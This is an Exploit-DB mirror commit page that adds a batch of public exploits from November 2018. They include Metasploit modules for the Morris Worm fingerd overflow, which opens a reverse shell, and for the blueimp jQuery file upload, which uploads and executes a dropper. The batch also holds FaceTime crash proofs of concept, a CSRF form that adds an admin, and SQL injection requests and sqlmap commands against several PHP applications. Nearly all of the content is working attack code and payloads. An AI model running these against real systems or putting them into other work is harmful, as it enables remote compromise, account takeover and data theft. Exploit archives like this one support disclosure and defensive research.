bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-11-07

Browse source 
18 changes to exploits/shellcodes

FaceTime - RTP Video Processing Heap Corruption
FaceTime - 'readSPSandGetDecoderParams' Stack Corruption
FaceTime - 'VCPDecompressionDecodeFrame' Memory Corruption
Blue Server 1.1 - Denial of Service (PoC)
eToolz 3.4.8.0 - Denial of Service (PoC)
VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)
Arm Whois 3.11 - Buffer Overflow (SEH)
libiec61850 1.3 - Stack Based Buffer Overflow
Morris Worm - sendmail Debug Mode Shell Escape (Metasploit)
blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)
Morris Worm - fingerd Stack Buffer Overflow (Metasploit)

PHP Proxy 3.0.3 - Local File Inclusion

Voovi Social Networking Script 1.0 - 'user' SQL Injection
CMS Made Simple 2.2.7 - Remote Code Execution
OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Add Admin)
Grocery crud 1.6.1 - 'search_field' SQL Injection
OOP CMS BLOG 1.0 - 'search' SQL Injection
OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection
LibreHealth 2.0.0 - Arbitrary File Actions
This commit is contained in:
Offensive Security 2018-11-07 05:01:44 +00:00
parent 363500a603
commit 11366ca935
19 changed files with 1255 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

113
exploits/bsd/remote/45791.rb Executable file
View file

@ -0,0 +1,113 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
# This is so one-off that we define it here
ARCH_VAX = 'vax'
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Morris Worm fingerd Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in fingerd on 4.3BSD.
This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
},
'Author' => [
'Robert Tappan Morris', # Discovery? Exploit and worm for sure
'Cliff Stoll', # The Cuckoo's Egg epilogue and inspiration
'wvu' # Module, payload, and additional research
],
'References' => [
['URL', 'https://en.wikipedia.org/wiki/Morris_worm'], # History
['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'], # Analysis
['URL', 'http://computerarcheology.com/Virus/MorrisWorm/'], # Details
['URL', 'https://github.com/arialdomartini/morris-worm'], # Source
['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
# And credit to the innumerable VAX ISA docs on the Web
],
'DisclosureDate' => 'Nov 2 1988',
'License' => MSF_LICENSE,
'Platform' => 'bsd',
'Arch' => ARCH_VAX,
'Privileged' => false, # Depends on inetd.conf, usually "nobody"
'Targets' => [
# https://en.wikipedia.org/wiki/Source_Code_Control_System
['@(#)fingerd.c 5.1 (Berkeley) 6/6/85',
'Ret' => 0x7fffe9b0,
'Payload' => {
'Space' => 403,
'BadChars' => "\n",
'Encoder' => 'generic/none', # There is no spoon
'DisableNops' => true # Hardcoded NOPs
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'bsd/vax/shell_reverse_tcp'}
))
register_options([Opt::RPORT(79)])
end
def check
token = rand_text_alphanumeric(8..42)
connect
sock.put("#{token}\n")
res = sock.get_once
return CheckCode::Unknown unless res
if res.include?("Login name: #{token}")
return CheckCode::Detected
end
CheckCode::Safe
rescue Rex::ConnectionError => e
vprint_error(e.message)
CheckCode::Unknown
ensure
disconnect
end
def exploit
# Start by generating our custom VAX shellcode
shellcode = payload.encoded
# 0x01 is NOP in VAX-speak
nops = "\x01" * (target.payload_space - shellcode.length)
# This overwrites part of the buffer
junk = rand_text_alphanumeric(109)
# This zeroes out part of the stack frame
frame = "\x00" * 16
# Finally, pack in our return address
ret = [target.ret].pack('V') # V is for VAX!
# The newline is for gets(3)
sploit = nops + shellcode + junk + frame + ret + "\n"
# Fire away
print_status('Connecting to fingerd')
connect
print_status("Sending #{sploit.length}-byte buffer")
sock.put(sploit)
# Hat tip @bcoles
rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
ensure
disconnect
end
end

14
exploits/ios/dos/45786.txt Normal file
View file

@ -0,0 +1,14 @@
There is a memory corruption issue when processing a malformed RTP video stream in FaceTime that leads to a kernel panic due to a corrupted heap cookie or data abort. This bug can be reached if a user accepts a call from a malicious caller. This issue only affects FaceTime on iOS, it does not crash on a Mac.
The issue can be reproduced using the attached sequence of RTP packets. To reproduce the issue:
1) Build video-replay.c in attached zip (gcc -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
2) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
3) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
4) Restart the machine
5) Extract the attached out folder in the zip to /out and change the permissions so it's readable by AVConference
6) Call target, when they pick up, the phone will crash
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45786.zip

111
exploits/linux/local/45798.txt Normal file
View file

@ -0,0 +1,111 @@
Exploit Title: libiec61850 1.3 - Stack Based Buffer Overflow
# Date: 2018-11-06
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: http://libiec61850.com/libiec61850/
# Software Link: https://github.com/mz-automation/libiec61850
# Version: 1.3
# Tested on: Linux 4.15.0-38-generic
# CVE: CVE-2018-18957
# References:
# https://github.com/mz-automation/libiec61850/issues/83
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18957
# Summary
# While fuzzing a stack based buffer overflow was found in libIEC61850 (the
# open-source library for the IEC 61850 protocols) in prepareGooseBuffer in
# goose/goose_publisher.c
## Steps to reproduce
$ ./goose_publisher_example crash_goosecr_stack_smash_overflow_aaaaaaaaa
Using interface crash_goosecr_stack_smash_overflow_aaaaaaaaa
*** stack smashing detected ***: <unknown> terminated
Aborted
$
## Debugging
(gdb) run crash_goosecr_stack_smash_overflow_aaaaaaaaa
Starting program:
/home/input0/Desktop/libiec61850/examples/goose_publisher/goose_publisher_example
crash_goosecr_stack_smash_overflow_aaaaaaaaa
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Using interface crash_goosecr_stack_smash_overflow_aaaaaaaaa
*** stack smashing detected ***: <unknown> terminated
Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007ffff7805801 in __GI_abort () at abort.c:79
#2 0x00007ffff784e897 in __libc_message (action=action@entry=do_abort,
fmt=fmt@entry=0x7ffff797b988 "*** %s ***: %s terminated\n")
at ../sysdeps/posix/libc_fatal.c:181
#3 0x00007ffff78f9cd1 in __GI___fortify_fail_abort
(need_backtrace=need_backtrace@entry=false,
msg=msg@entry=0x7ffff797b966 "stack smashing detected") at
fortify_fail.c:33
#4 0x00007ffff78f9c92 in __stack_chk_fail () at stack_chk_fail.c:29
#5 0x000055555555a211 in Ethernet_getInterfaceMACAddress
(interfaceId=0x7fffffffdeee "crash_goosecr_stack_smash_overflow_aaaaaaaaa",
addr=0x7fffffffd91c "k_smas\377\377") at
hal/ethernet/linux/ethernet_linux.c:170
#6 0x00005555555594ee in prepareGooseBuffer (self=0x5555557637d0,
parameters=0x7fffffffd9ac,
interfaceID=0x7fffffffdeee
"crash_goosecr_stack_smash_overflow_aaaaaaaaa") at
src/goose/goose_publisher.c:168
#7 0x0000555555559293 in GoosePublisher_create (parameters=0x7fffffffd9ac,
interfaceID=0x7fffffffdeee
"crash_goosecr_stack_smash_overflow_aaaaaaaaa") at
src/goose/goose_publisher.c:72
#8 0x0000555555555387 in main (argc=2, argv=0x7fffffffdaa8) at
goose_publisher_example.c:52
(gdb) i r
rax 0x0 0
rbx 0x7fffffffd6b0 140737488344752
rcx 0x7ffff7803e97 140737345765015
rdx 0x0 0
rsi 0x7fffffffd410 140737488344080
rdi 0x2 2
rbp 0x7fffffffd840 0x7fffffffd840
rsp 0x7fffffffd410 0x7fffffffd410
r8 0x0 0
r9 0x7fffffffd410 140737488344080
r10 0x8 8
r11 0x246 582
r12 0x7fffffffd6b0 140737488344752
r13 0x1000 4096
r14 0x0 0
r15 0x30 48
rip 0x7ffff7803e97 0x7ffff7803e97 <__GI_raise+199>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb)
## src
Snip : src/goose/goose_publisher.c
{
GoosePublisher self = (GoosePublisher) GLOBAL_CALLOC(1, sizeof(struct
sGoosePublisher));
prepareGooseBuffer(self, parameters, interfaceID);
self->timestamp = MmsValue_newUtcTimeByMsTime(Hal_getTimeInMs());
GoosePublisher_reset(self);
return self;
}
Snip: src/goose/goose_publisher.c
if (interfaceID != NULL)
Ethernet_getInterfaceMACAddress(interfaceID, srcAddr);
else
Ethernet_getInterfaceMACAddress(CONFIG_ETHERNET_INTERFACE_ID, srcAddr);

27
exploits/macos/dos/45787.txt Normal file
View file

@ -0,0 +1,27 @@
There are a variety of problems that occur when processing malformed H264 streams in readSPSandGetDecoderParams, leading to OOB read, OOB write and stack_chk crashes. I think the root cause is stack corruption. This issue can occur if someone accepts a malicious FaceTime call.
To reproduce the issue:
On the target device:
1) build no-encrypt.c (gcc -dynamiclib -o mylib)
2) copy the file to /usr/lib/mylib
3) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
This will strip encryption to allow the target to receive unencrypted packets. It is also possible to repro this issue using the method described in issue 1634 , but it is much more reliable and debuggable with the unencrypted packets
On the host device:
1) Build video-replay.c attached (gcc -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
2) Use bspatch to apply the attached binpatch to /System/Library/PrivateFrameworks/AVConference.framework/Versions/Current/AVConference. The version I patched has an md5 sum of 0de78198e29ae43e686f59d550150d1b and the patched version has an md5 sum of af5bb770f08e315bf471a0fadcf96cf8. This patch alters SendRTP to retrieve the length of an encrypted packet from offset 0x650 of the encrypted buffer, as the existing code doesn't respect the output size returned from CCCryptorUpdate
3) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
4) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
5) Restart the machine
6) Extract the attached sc.zip to /out and change the permissions so it's readable by AVConference
7) Call target, when they pick up, AVConference will crash
When I reproduced this, my host was a Mac mini running version 10.13.6. My target was a MacBook Pro running 10.13.6. This PoC only works on a Mac, but the vulnerable code appears to be in iOS 11.3.1 as well.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45787.zip

53
exploits/macos/dos/45788.txt Normal file
View file

@ -0,0 +1,53 @@
There is a heap corruption vulnerability in VCPDecompressionDecodeFrame which is called by FaceTime. This bug can be reached if a user accepts a call from a malicious peer.
The issue can be reproduced using the attached sequence of RTP packets. To reproduce the issue:
1) Build video-replay.c attached (gcc -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
2) Use bspatch to apply the attached binpatch to /System/Library/PrivateFrameworks/AVConference.framework/Versions/Current/AVConference. The version I patched has an md5 sum of 0de78198e29ae43e686f59d550150d1b and the patched version has an md5 sum of af5bb770f08e315bf471a0fadcf96cf8. This patch alters SendRTP to retrieve the length of an encrypted packet from offset 0x650 of the encrypted buffer, as the existing code doesn't respect the output size returned from CCCryptorUpdate
3) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
4) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
5) Restart the machine
6) Extract the attached out.zip to /out and change the permissions so it's readable by AVConference
7) Call target, when they pick up, AVConference will crash
When I reproduced this, my host was a Mac mini running version 10.13.6. My target was a MacBook Pro running 10.13.6. This PoC only works on a Mac, but the vulnerable code appears to be in iOS 11.3.1 as well.
* thread #27, name = 'com.apple.avconference.soundplayer.recvproc', stop reason = EXC_BAD_ACCESS (code=1, address=0x21c6a1ff6)
frame #0: 0x00007fff6bd71892 VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing + 4492
VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing:
-> 0x7fff6bd71892 <+4492>: movl (%rcx,%rbx), %r8d
0x7fff6bd71896 <+4496>: bswapl %r8d
0x7fff6bd71899 <+4499>: movl %eax, %ecx
0x7fff6bd7189b <+4501>: shll %cl, %r8d
Target 0: (avconferenced) stopped.
(lldb) bt
* thread #27, name = 'com.apple.avconference.soundplayer.recvproc', stop reason = EXC_BAD_ACCESS (code=1, address=0x21c6a1ff6)
* frame #0: 0x00007fff6bd71892 VideoProcessing`___lldb_unnamed_symbol2778$$VideoProcessing + 4492
frame #1: 0x00007fff6bd976b6 VideoProcessing`___lldb_unnamed_symbol3007$$VideoProcessing + 117
frame #2: 0x00007fff6bda4eb9 VideoProcessing`___lldb_unnamed_symbol3043$$VideoProcessing + 513
frame #3: 0x00007fff6bda4b76 VideoProcessing`___lldb_unnamed_symbol3042$$VideoProcessing + 560
frame #4: 0x00007fff6bd6b252 VideoProcessing`___lldb_unnamed_symbol2741$$VideoProcessing + 4206
frame #5: 0x00007fff53cf67f4 VideoToolbox`___lldb_unnamed_symbol79$$VideoToolbox + 1233
frame #6: 0x00007fff53cf5373 VideoToolbox`___lldb_unnamed_symbol59$$VideoToolbox + 401
frame #7: 0x00007fff6bca7381 VideoProcessing`VCPDecompressionSessionDecodeFrame + 423
frame #8: 0x000000010bb86bab AVConference`VideoPlayer_ShowFrame + 1384
frame #9: 0x000000010bb8cf98 AVConference`VideoReceiver_ShowFrame + 740
frame #10: 0x000000010bb8c5be AVConference`VideoReceiver_VideoAlarm + 720
frame #11: 0x000000010bb78933 AVConference`SoundPlayer_AlarmThread + 364
frame #12: 0x00007fff484fe98b CoreMedia`figThreadMain + 277
frame #13: 0x00007fff6f6a6661 libsystem_pthread.dylib`_pthread_body + 340
frame #14: 0x00007fff6f6a650d libsystem_pthread.dylib`_pthread_start + 377
frame #15: 0x00007fff6f6a5bf9 libsystem_pthread.dylib`thread_start + 13
I've improved the PoC a lot for this, an updated video-replay.c is attached. This version does not require the binary patch for the sender binary, other than adding the library with insert_dylib. So to use this one:
1) Build video-replay.c attached (g++ -std=c++11 -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
2) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
3) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
4) Restart the machine
5) Extract the attached out.zip to /out and change the permissions so it's readable by AVConference
6) Call target with FaceTime, when they pick up, AVConference will crash
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45788.zip

188
exploits/php/remote/45790.rb Executable file
View file

@ -0,0 +1,188 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => "blueimp's jQuery (Arbitrary) File Upload",
'Description' => %q{
This module exploits an arbitrary file upload in the sample PHP upload
handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.
Due to a default configuration in Apache 2.3.9+, the widget's .htaccess
file may be disabled, enabling exploitation of this vulnerability.
This vulnerability has been exploited in the wild since at least 2015
and was publicly disclosed to the vendor in 2018. It has been present
since the .htaccess change in Apache 2.3.9.
This module provides a generic exploit against the jQuery widget.
},
'Author' => [
'Claudio Viviani', # WordPress Work the Flow (Arbitrary) File Upload
'Larry W. Cashdollar', # (Re)discovery, vendor disclosure, and PoC
'wvu' # Metasploit module
],
'References' => [
['CVE', '2018-9206'],
['URL', 'http://www.vapidlabs.com/advisory.php?v=204'],
['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514'],
['URL', 'https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206'],
['URL', 'https://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/'],
['URL', 'https://github.com/rapid7/metasploit-framework/pull/5130'],
['URL', 'https://httpd.apache.org/docs/current/mod/core.html#allowoverride']
],
'DisclosureDate' => 'Oct 9 2018', # Larry's disclosure to the vendor
'License' => MSF_LICENSE,
'Platform' => ['php', 'linux'],
'Arch' => [ARCH_PHP, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
['PHP Dropper', 'Platform' => 'php', 'Arch' => ARCH_PHP],
['Linux Dropper', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64]]
],
'DefaultTarget' => 0
))
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/jQuery-File-Upload'])
])
end
def version_paths
%w[
/package.json
/bower.json
].map { |u| normalize_uri(target_uri.path, u) }
end
# List from PoC sorted by frequency
def upload_paths
%w[
/server/php/index.php
/server/php/upload.class.php
/server/php/UploadHandler.php
/example/upload.php
/php/index.php
].map { |u| normalize_uri(target_uri.path, u) }
end
def check
a = nil
version_paths.each do |u|
vprint_status("Checking #{u}")
res = send_request_cgi(
'method' => 'GET',
'uri' => u
)
next unless res
unless a
res.headers['Server'] =~ /Apache\/([\d.]+)/ &&
$1 && (a = Gem::Version.new($1))
if a && a >= Gem::Version.new('2.3.9')
vprint_good("Found Apache #{a} (AllowOverride None may be set)")
elsif a
vprint_warning("Found Apache #{a} (AllowOverride All may be set)")
end
end
next unless res.code == 200 && (j = res.get_json_document) &&
j['version'] && (v = Gem::Version.new(j['version']))
if v <= Gem::Version.new('9.22.0')
vprint_good("Found unpatched jQuery File Upload #{v}")
return CheckCode::Appears
else
vprint_error("Found patched jQuery File Upload #{v}")
return CheckCode::Safe
end
end
CheckCode::Unknown
end
def find_upload
upload_paths.each do |u|
vprint_status("Checking #{u}")
res = send_request_cgi(
'method' => 'GET',
'uri' => u
)
if res && res.code == 200
vprint_good("Found #{u}")
return u
end
end
nil
end
def exploit
unless check == CheckCode::Appears && (u = find_upload)
fail_with(Failure::NotFound, 'Could not find target')
end
f = "#{rand_text_alphanumeric(8..42)}.php"
p = normalize_uri(File.dirname(u), 'files', f)
print_status('Uploading payload')
res = upload_payload(u, f)
unless res && res.code == 200 && res.body.include?(f)
fail_with(Failure::NotVulnerable, 'Could not upload payload')
end
print_good("Payload uploaded: #{full_uri(p)}")
print_status('Executing payload')
exec_payload(p)
print_status('Deleting payload')
delete_payload(u, f)
end
def upload_payload(u, f)
p = get_write_exec_payload(unlink_self: true)
m = Rex::MIME::Message.new
m.add_part(p, nil, nil, %(form-data; name="files[]"; filename="#{f}"))
send_request_cgi(
'method' => 'POST',
'uri' => u,
'ctype' => "multipart/form-data; boundary=#{m.bound}",
'data' => m.to_s
)
end
def exec_payload(p)
send_request_cgi({
'method' => 'GET',
'uri' => p
}, 1)
end
def delete_payload(u, f)
send_request_cgi(
'method' => 'DELETE',
'uri' => u,
'vars_get' => {'file' => f}
)
end
end

1
exploits/php/webapps/45680.txt
View file

@ -7,6 +7,7 @@
# Version: v7.2.5
# Category: Webapps
# Tested on: XAMPP for Linux 7.2.8-0
# CVE: CVE-2018-18924
# Description : ProjeQtOr PMT 7.2.5 and lower versions allows to upload arbitrary "shtml" files which
# leads to a remote command execution on the remote server.

34
exploits/php/webapps/45793.py Executable file
View file

File diff suppressed because one or more lines are too long

116
exploits/php/webapps/45794.txt Normal file
View file

@ -0,0 +1,116 @@
# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-11-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://zsoft.com.bd/
# Software Link: https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/admin/addUser.php
#
POST /[PATH]/admin/addUser.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=macg4h63q378u11758a1pslek7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
userName=efe&name=efe&password=efe&email=efe@omerefe.com&details=efe&role=1&submit=Create
HTTP/1.1 302 Found
Date: Tue, 06 Nov 2018 20:57:18 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: max-age=2592000
Pragma: no-cache
Location: login.php
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
/* `exploitdb`.`tbl_user` */
$tbl_user = array(
array('id' => '38','name' => 'efe','username' => 'efe','password' => '5ebf8364d17c8df7e4afd586c24f84a0','email' => 'efe@omerefe.com','details' => 'efe','role' => '1')
);
# POC:
# 2)
# http://localhost/[PATH]/admin/addUser.php
#
<html>
<body>
<form action="http://192.168.1.36/ExploitDb/blog_fo_rup/admin/addUser.php" method="post" enctype="multipart/form-data">
<table class="form">
<tbody><tr>
<td>
<label>User Name</label>
</td>
<td>
<input name="userName" placeholder="Enter User Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>Full Name</label>
</td>
<td>
<input name="name" placeholder="Enter User Full Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>User Password</label>
</td>
<td>
<input name="password" placeholder="Enter User Password..." type="text">
</td>
</tr>
<tr>
<td>
<label>Email</label>
</td>
<td>
<input name="email" placeholder="Enter User Email..." type="text">
</td>
</tr>
<tr>
<td>
<label>Details</label>
</td>
<td>
<textarea name="details"></textarea>
</td>
</tr>
<tr>
<td>
<label>User Roll</label>
</td>
<td>
<select id="select" name="role">
<option>Select User Role</option>
<option value="0">Admin</option>
<option value="1">Author</option>
<option value="2">Editor</option>
</select>
</td>
</tr>
<tr>
<td></td>
<td>
<input name="submit" value="Create" type="submit">
</td>
</tr>
</tbody>
</table>
</form>
</body>
</html>

47
exploits/php/webapps/45795.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: Grocery crud 1.6.1 - 'search_field' SQL Injection
# Google Dork: n/a
# Date: 2018-11-05
# Exploit Author: Loading Kura Kura
# Vendor Homepage: https://www.grocerycrud.com/
# Software Link: https://www.grocerycrud.com/downloads
# Version: 1.6.1
# Tested on: Win10/Kali Linux
# CVE :
# 1. Proof of Concept :
# save request to file, example request.txt
sqlmap -r grocery.txt --level=3 --risk=2 --dbs --dbms=mysql --fresh-queries -p search_field
Request
========================
POST /grocerycrud/index.php/examples/customers_management/ajax_list_info HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/grocerycrud/index.php/examples/customers_management
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 91
Connection: close
search_text=dd&search_field=%5c%27city&per_page=10&order_by%5B0%5D=&order_by%5B1%5D=&page=1
========================
vuln on parameter "search_field"
================================
Parameter: search_field (POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: search_text=dd&search_field=-7154 OR 1 GROUP BY CONCAT(0x7178707a71,(SELECT (CASE WHEN (3651=3651) THEN 1 ELSE 0 END)),0x716b6a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&per_page=10&order_by[0]=&order_by[1]=&page=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: search_text=dd&search_field=(CASE WHEN (2922=2922) THEN SLEEP(5) ELSE 2922 END)&per_page=10&order_by[0]=&order_by[1]=&page=1
================================
bug hunter....

70
exploits/php/webapps/45799.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: OOP CMS BLOG 1.0 - 'search' SQL Injection
# Dork: N/A
# Date: 2018-11-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://zsoft.com.bd/
# Software Link: https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/search.php?search=[SQL]
#
GET /[PATH]/search.php?search=Efe%27%20%20UNION%20SELECT%201,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),4,5,6,7,8,9--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 06 Nov 2018 20:31:15 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/page.php?pageid=[SQL]
#
GET /[PATH]/page.php?pageid=8%20%20UNION(SELECT%20%28%31%29,%28%32%29,(SELECT%20GROUP_CONCAT(schema_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.SCHEMATA))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 06 Nov 2018 20:33:44 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/posts.php?id=[SQL]
#
GET /[PATH]/posts.php?id=3%27++UNION+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 06 Nov 2018 20:35:57 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 3732
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

54
exploits/php/webapps/45801.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection
# Date: ]2018-11-05
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://sourceforge.net/projects/bigchef/
# Software Link: https://sourceforge.net/projects/bigchef/files/latest/download
# Version: v3.0.8
# Category: Webapps
# Tested on: XAMPP for Linux 1.7.2
# Description: Cubi Platform login page is prone to an SQL-injection vulnerability.
# Exploiting this issue could allow an attacker to compromise the application,
# access or modify data, or exploit latent vulnerabilities in the underlying database.
#########################################################
# PoC : SQLi :
# POST : POST
/bin/controller.php?F=RPCInvoke&P0=[user.form.LoginForm]&P1=[Login]&__this=btn_login:onclick&_thisView=user.view.LoginView&jsrs=1
# Parameter: MULTIPART username ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
# Payload:
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="username"
admin' AND SLEEP(5)-- JgaK
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="password"
password
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="session_timeout"
Don't save session
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="session_timeout"
0
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="current_language"
English ( en_US )
-----------------------------71911072106778878648823492
